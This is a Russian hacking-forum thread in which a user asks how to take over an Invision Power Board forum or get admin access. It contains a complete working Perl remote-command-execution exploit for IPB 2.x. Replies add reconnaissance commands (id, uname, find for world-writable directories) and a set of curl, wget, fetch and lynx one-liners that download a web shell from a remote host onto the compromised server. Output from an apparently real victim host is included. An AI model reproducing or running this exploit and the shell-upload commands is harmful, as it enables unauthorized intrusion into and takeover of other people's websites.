Форум АНТИЧАТ - Ipb 2.0* Могу выполнять команды, проблемма с заливкой шелла

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

Ipb 2.0* Могу выполнять команды, проблемма с заливкой шелла

Кароч расклад такой...

Воспользовался сплоитом

все ок команды выполняются.
ТОлько вот шелл заоить не могу, видимо отключены команды.

ПОДСКАЖИТЕ ПЛИЗ КАК, сломать форум иль заити как АДМИН зарание благодарен САМ.

PHP код:


		
			
#!/usr/bin/perl



## Invision Power Board 2.* commands execution exploit by RST/GHC

## vulnerable versions <= 2.1.5

## tested on 2.1.4, 2.0.2

##

## (c)oded by 1dt.w0lf

## RST/GHC

## http://rst.void.ru

## http://ghc.ru





use IO::Socket;

use Getopt::Std;



getopts("l:h:p:d:f:v:");



$host     = $opt_h;

$dir      = $opt_d;

$login    = $opt_l;

$password = $opt_p;

$forum    = $opt_f;

$version  = $opt_v || 0;



$|++;



header();

if(!$host||!$dir||!$login||!$password||!$forum) { usage(); }



print "[~]    SERVER : $host\r\n";

print "[~]      PATH : $dir\r\n";

print "[~]     LOGIN : $login\r\n";

print "[~]  PASSWORD : $password\r\n";

print "[~]    TARGET : $version";

print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*'));

print "\r\n";



{

print "\r\nCommand for execute or 'exit' for exit ";

while(<STDIN>)

{

        $cmd=$_;

        chomp($cmd);

        exit() if ($cmd eq 'exit');

        last;

     }

     $len = length($cmd);

     for ($i=0; $i<$len; $i++)

        {

         $s = substr($cmd,$i,1);

         $out.="chr(".ord($s).")";

         if($i != $len-1) 

            {

             $out.=".";

            }

          

        }

    $out = "$out)."."chr(59).exit";

 }



print "[~] Login ... ";



$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";

$login    =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$post     = 'UserName='.$login.'&PassWord='.$password;

$loggedin = 0;

print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n";

print $sock "Host: $host\r\n";

print $sock "Connection: close\r\n";

print $sock "Content-Type: application/x-www-form-urlencoded\n";

print $sock "Content-length: ".length($post)."\r\n\r\n";

print $sock "$post";

print $sock "\r\n\r\n";

while (<$sock>)

{  

 if(/session_id=([a-f|0-9]{32})/) { $sid = $1; }

}

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";

print $sock "GET ${dir}index.php HTTP/1.1\r\n";

print $sock "Host: $host\r\n";

print $sock "Cookie: session_id=$sid;\r\n";

print $sock "Connection: close\r\n\r\n";

while (<$sock>)

{    

 if(/act=Login&amp;CODE=03/) { $loggedin = 1; last; }

}

if($loggedin) { print " [ DONE ]\r\n"; }

else { print " [ FAILED ]\r\n"; exit(); }



print "[+] SID: $sid\r\n";



print "[~] Try get md5_check ...";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";

if($version==1)

 {

 print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n";

 }

else

 {

 print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n";

 }

print $sock "Host: $host\r\n";

print $sock "Cookie: session_id=$sid;\r\n";

print $sock "Connection: close\r\n\r\n";

while (<$sock>)

 {  

 if($version == 1 && /ipb_md5_check\s*= \"([a-f|0-9]{32})\"/)  { $md5_check = $1; last; }

 if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; }

 }

close($sock);

if($md5_check) { print " [ DONE ]\r\n"; print "[+] MD5_CHECK : $md5_check\r\n"; }

else { print " [ FAILED ]\r\n"; exit(); }



print "[~] Create new message ...";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";

$created = 0;

$text = 'eval(system('.$out.'()); //';

$post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0&CODE=01&post_key=&TopicTitle=Wazzzup&TopicDesc=&poll_question=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0";

print $sock "POST ${dir}index.php HTTP/1.1\r\n";

print $sock "Host: $host\r\n";

print $sock "Cookie: session_id=$sid;\r\n";

print $sock "Connection: close\r\n";

print $sock "Content-Type: application/x-www-form-urlencoded\n";

print $sock "Content-length: ".length($post)."\r\n\r\n";

print $sock "$post";

print $sock "\r\n\r\n";

while (<$sock>)

 {  

 if(/Location:/) { $created = 1; last; }

 }

if($created) { print " [ DONE ]\r\n"; }

else { print " [ FAILED ]\r\n"; exit(); }



$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[~] Search message ...";

$post = 'keywords=eval&namesearch='.$login.'&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=posts';

print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1\r\n";

print $sock "Host: $host\r\n";

print $sock "Cookie: session_id=$sid;\r\n";

print $sock "Connection: close\r\n";

print $sock "Content-Type: application/x-www-form-urlencoded\n";

print $sock "Content-length: ".length($post)."\r\n\r\n";

print $sock "$post";

print $sock "\r\n\r\n";



while (<$sock>)

 {

 if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; }

 }



if($searchid) { print " [ DONE ]\r\n"; }

else { print "[ FAILED ]\r\n"; exit(); }

print "[+] SEARCHID: $searchid\r\n";



$get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=posts&result_type=posts&highlite=eval&lastdate=z|eval.*?%20//)%23e%00';

print "Go to URL:\n ".$host.$dir.$get."";



sub header()

 {

 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~\r\n";   

 print " Invision Power Board 2.* commands execution exploit by RST/GHC\r\n";

 print "                    eDiTeD by DimaHbl4\r\n";

 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~\r\n";

 }

 

sub usage()

 {

 print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> -v <version>\r\n\r\n";

 print "<host>     - host where IPB installed e.g www.ipb.com\r\n";

 print "<dir>      - folder where IPB installed e.g. /forum/ , /ipb/ , etc...\r\n";

 print "<login>    - login of any exist user\r\n";

 print "<password> - and password too )\r\n";

 print "<forum>    - number of forum where user can create topic e.g 2,4, etc\r\n";

 print "<version>  - forum version:\r\n";

 print "             0 - 2.0.*\r\n";

 print "             1 - 2.1.*\r\n";

 exit();

 }

Напиши тут вывод след-их команд:

id
uname -a
which lynx links get wget fetch curl

Ну и далее, найди директорию или файл с правами на запись. А дальше поможем залить шелл :))).

Цитата:

Сообщение от SladerNon

id
uid=501(www) gid=501(www) groups=501(www)

uname -a
Linux zmaximum.ru 2.6.11.5zm1_avi_smp #16 SMP Mon Oct 24 18:41:58 MSD 2005 i686 unknown unknown GNU/Linux

ls -l

total 1192 -rwxrwxrwx 1 dmitri elistagrp 12397 Jan 28 2006 admin.php drwxrwxrwx 2 dmitri elistagrp 4096 Jan 25 2006 blog -rw-r--r-- 1 dmitri elistagrp 138974 Jan 28 2006 blog_templates.xml drwxrwxrwx 4 dmitri elistagrp 4096 Jan 28 2006 cache drwxr-xr-x 2 dmitri elistagrp 4096 Sep 22 10:31 camera -rwxrwxrwx 1 dmitri elistagrp 8747 Oct 3 02:19 conf_global.php -rw-r--r-- 1 dmitri elistagrp 5535 Mar 8 2006 d21_aaimy_data.xml -rw-r--r-- 1 dmitri elistagrp 122326 Jan 28 2006 d21_shoutbox_data.xml -rw-r--r-- 1 dmitri elistagrp 2468 Mar 8 2006 d21_sma_data.xml -rw-r--r-- 1 dmitri elistagrp 3823 Mar 8 2006 fade.js -rw-r--r-- 1 dmitri elistagrp 1406 Jan 28 2006 favicon.ico -rwxrwxrwx 1 dmitri elistagrp 75504 Jan 28 2006 gallery_templates.xml drwxr-xr-x 3 dmitri elistagrp 4096 Jul 30 15:34 html -rwxrwxrwx 1 dmitri elistagrp 20038 Mar 9 2006 index.php -rw-r--r-- 1 dmitri elistagrp 6055 Jan 28 2006 init.php -rwxrwxrwx 1 dmitri elistagrp 447830 Jun 29 12:03 ipb_templates.xml -rwxrwxrwx 1 dmitri elistagrp 7678 Jan 28 2006 ipchat.php drwxrwxrwx 4 dmitri elistagrp 4096 Aug 9 11:08 ips_kernel drwxrwxrwx 2 dmitri elistagrp 4096 Aug 9 11:03 jscripts drwxrwxrwx 5 dmitri elistagrp 4096 Jan 23 2006 lang drwxrwxrwx 2 dmitri elistagrp 4096 Jan 23 2006 lofiversion -rw-r--r-- 1 dmitri elistagrp 21983 Feb 22 2006 mlite_settings.xml -rw-r--r-- 1 dmitri elistagrp 145041 Feb 22 2006 mlite_templates.xml drwxrwxrwx 6 dmitri elistagrp 4096 Oct 3 02:48 modules -rw-r--r-- 1 dmitri elistagrp 35439 Feb 13 2006 preview.PNG drwxrwxrwx 2 dmitri elistagrp 4096 Jan 23 2006 retail drwxrwxrwx 4 dmitri elistagrp 4096 Jan 24 2006 skin_acp drwxrwxrwx 7 dmitri elistagrp 4096 Jan 27 2006 skin_cache drwxrwxrwx 21 dmitri elistagrp 4096 Mar 8 2006 sources drwxrwxrwx 8 dmitri elistagrp 4096 May 31 15:10 style_avatars drwxrwxrwx 3 dmitri elistagrp 4096 Feb 20 2006 style_emoticons drwxrwxrwx 15 dmitri elistagrp 4096 Aug 15 16:27 style_images drwxrwxrwx 26 dmitri elistagrp 4096 Jan 28 2006 upgrade drwxrwxrwx 14 dmitri elistagrp 40960 Oct 26 22:41 uploads -rw-r--r-- 1 dmitri elistagrp 1012 Jun 21 09:02 winamp.gif
А какие папкм доступные на запись???

samsam найди доступные папки-файлы на запись...

find /дира сайта/ -perm -2 -ls (и то и то ищет)
find /дира сайта/ -type d -perm -2 -ls (только папки доступные на запись)

PS лол ))) ваще не понятно где шелл лежит.. )) пропалился ты чувак..

drwxrwxrwx-> папка в которую розрешина запись.

проверь вывод команды id и глянь там за какого ты там пользователя команды выполняешь, потом ищи папки созданные этим пользователем и заливай туды

Цитата:

Сообщение от NeX

id
uid=501(www) gid=501(www) groups=501(www)

ls -l

total 1192 -rwxrwxrwx 1 dmitri elistagrp 12397 Jan 28 2006 admin.php drwxrwxrwx 2 dmitri elistagrp 4096 Jan 25 2006 blog -rw-r--r-- 1 dmitri elistagrp 138974 Jan 28 2006 blog_templates.xml drwxrwxrwx 4 dmitri elistagrp 4096 Jan 28 2006 cache drwxr-xr-x 2 dmitri elistagrp 4096 Sep 22 10:31 camera -rwxrwxrwx 1 dmitri elistagrp 8747 Oct 3 02:19 conf_global.php -rw-r--r-- 1 dmitri elistagrp 5535 Mar 8 2006 d21_aaimy_data.xml -rw-r--r-- 1 dmitri elistagrp 122326 Jan 28 2006 d21_shoutbox_data.xml -rw-r--r-- 1 dmitri elistagrp 2468 Mar 8 2006 d21_sma_data.xml -rw-r--r-- 1 dmitri elistagrp 3823 Mar 8 2006 fade.js -rw-r--r-- 1 dmitri elistagrp 1406 Jan 28 2006 favicon.ico -rwxrwxrwx 1 dmitri elistagrp 75504 Jan 28 2006 gallery_templates.xml drwxr-xr-x 3 dmitri elistagrp 4096 Jul 30 15:34 html -rwxrwxrwx 1 dmitri elistagrp 20038 Mar 9 2006 index.php -rw-r--r-- 1 dmitri elistagrp 6055 Jan 28 2006 init.php -rwxrwxrwx 1 dmitri elistagrp 447830 Jun 29 12:03 ipb_templates.xml -rwxrwxrwx 1 dmitri elistagrp 7678 Jan 28 2006 ipchat.php drwxrwxrwx 4 dmitri elistagrp 4096 Aug 9 11:08 ips_kernel drwxrwxrwx 2 dmitri elistagrp 4096 Aug 9 11:03 jscripts drwxrwxrwx 5 dmitri elistagrp 4096 Jan 23 2006 lang drwxrwxrwx 2 dmitri elistagrp 4096 Jan 23 2006 lofiversion -rw-r--r-- 1 dmitri elistagrp 21983 Feb 22 2006 mlite_settings.xml -rw-r--r-- 1 dmitri elistagrp 145041 Feb 22 2006 mlite_templates.xml drwxrwxrwx 6 dmitri elistagrp 4096 Oct 3 02:48 modules -rw-r--r-- 1 dmitri elistagrp 35439 Feb 13 2006 preview.PNG drwxrwxrwx 2 dmitri elistagrp 4096 Jan 23 2006 retail drwxrwxrwx 4 dmitri elistagrp 4096 Jan 24 2006 skin_acp drwxrwxrwx 7 dmitri elistagrp 4096 Jan 27 2006 skin_cache drwxrwxrwx 21 dmitri elistagrp 4096 Mar 8 2006 sources drwxrwxrwx 8 dmitri elistagrp 4096 May 31 15:10 style_avatars drwxrwxrwx 3 dmitri elistagrp 4096 Feb 20 2006 style_emoticons drwxrwxrwx 15 dmitri elistagrp 4096 Aug 15 16:27 style_images drwxrwxrwx 26 dmitri elistagrp 4096 Jan 28 2006 upgrade drwxrwxrwx 14 dmitri elistagrp 40960 Oct 26 22:41 uploads -rw-r--r-- 1 dmitri elistagrp 1012 Jun 21 09:02 winamp.gif
И ГДЕ ТАМ МОЙ ID????

Цитата:

Сообщение от samsam

id
И ГДЕ ТАМ МОЙ ID????

id
uid=501(www) gid=501(www) groups=501(www)

Цитата:

id
uid=501(www) gid=501(www) groups=501(www)

права не ахти )))
глянул вывод команды ls -al, там же есть папки drwxrwxrwx вот попробуй туда заливать

curl --output /kuda/zalivaem/shell.php http://otkuda.zalivaem.com/shell.txt
fetch -o /kuda/zalivaem/shell.php http://otkuda.zalivaem.com/shell.txt
wget -o /kuda/zalivaem/shell.php http://otkuda.zalivaem.com/shell.txt
get http://otkuda.zalivaem.com/shell.txt > /kuda/zalivaem/shell.php
links -source "http://otkuda.zalivaem.com/shell.txt" > /kuda/zalivaem/shell.php
lynx -source http://otkuda.zalivaem.com/shell.txt > /kuda/zalivaem/shell.php

Цитата:

Сообщение от NeX

Ни фига не че не выполняется
Ситуация такая
C:\>1.pl -h www.site.org -d /forums/ -l user -p pass -f 22 -v 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~
Invision Power Board 2.* commands execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~
[~] SERVER : www.site.org
[~] PATH : /forums/
[~] LOGIN : user
[~] PASSWORD : pass
[~] TARGET : 0 - IPB 2.0.*
[~] Login ... [ DONE ]
[+] SID: 758a3333eaf4c82485785c17be49d61f
[~] Try get md5_check ... [ DONE ]
[+] MD5_CHECK : 3f1f3e57fec974df1360c447cef364fb
[~] Create new message ... [ DONE ]
[~] Search message ... [ DONE ]
[+] SEARCHID: b8d3ddbfcbf65b005eefecbb7191811c

Command for execute or 'exit' for exit #curl -o /tmp/shell.php http://site.ru/shell.php

Go to www.site.org/forums/index.php?act=Search&CODE=show&searchid=45cf31c70a 91f57ddcb09792b06d876e&search_in=posts&result_type =posts&highlite=eval&lastdate=z|eval.*?%20//)%23e%00

Перехожу на эту страницу она пустая.
Хочу запустить шел типа ввожу строку

www.site.org/forums/tmp/shell.php
ответ прост
Not Found
The requested URL http://www.site.org/forums/tmp/r.php was not found on this server.
Помогите кто чем может.